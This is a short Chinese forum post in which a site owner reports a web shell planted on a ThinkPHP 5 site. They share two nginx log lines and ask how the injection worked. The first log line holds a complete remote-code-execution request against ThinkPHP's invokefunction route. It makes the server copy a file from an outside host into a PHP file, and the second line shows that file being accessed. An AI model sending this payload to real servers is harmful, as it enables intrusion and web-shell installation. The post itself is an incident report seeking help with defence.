thinkphp5.07 木马文件注入

浏览:1408 发布日期:2019/06/04
5.0.0 - 致命 - 已关闭
180.210.203.171 - - [28/May/2019:13:52:22 +0800] "GET /index.php?s=index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=http://43.255.29.112/php/dd.txt&vars[1][]=lu.php HTTP/2.0" 500 32119 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36"
180.210.203.171 - - [28/May/2019:13:52:31 +0800] "GET /lu.php HTTP/2.0" 200 831 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36"
这是nginx记录lu.php被注入的记录,但我自己通过url去还原,却失败了,相知道是怎么注入到tp5的,被注入php文件后,基本上也说明整个站点报废了。有需要了解的我可以提供详细日志
评论(
后面还有条评论,点击查看>>